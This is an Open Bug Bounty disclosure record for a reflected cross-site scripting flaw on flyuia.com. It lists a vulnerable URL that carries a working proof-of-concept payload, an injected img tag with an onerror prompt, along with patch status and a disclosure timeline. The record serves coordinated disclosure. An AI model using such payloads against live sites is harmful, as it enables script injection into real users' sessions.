flyuia.com XSS vulnerability

2016-09-26T01:48:00
ID OBB:183591
Type openbugbounty
Reporter WhitePacket
Modified 2017-07-28T11:30:00

Description

Vulnerable URL:
http://www.flyuia.com/amadeus/symphony.php?arr_1=1&arr;_0=1&infcount;=1&symphony;_langid=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(%27XSSPOSED%27)%3E&journey;_type=oj&wcag;_on=0&airlines;=ps&dep;_1=1&dep;_0=1&ycdcount;=0&pricer;_pref=frp&id;_location=ua&adtcount;=1&date;_1=1&date;_0=1&langid;=uk&chdcount;=1&ythcount;=0&next;=1&s2;_web_id=symphony&cabin;_pref=1
Details:

Description| Value
---|---
Patched:| Yes, at 28.07.2017
Latest check for patch:| 28.07.2017 11:30 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 22466
VIP website status:| Yes
Check flyuia.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 26 September, 2016 01:48 GMT
Generic security notifications sent to website owner| 26 September, 2016 01:51 GMT
Notification sent to subscribers (without technical details)| 26 September, 2016 02:17 GMT
Vulnerability details disclosed by researcher| 3 October, 2016 02:12 GMT
Vulnerability patched by the website owner| 28 July, 2017 11:30 GMT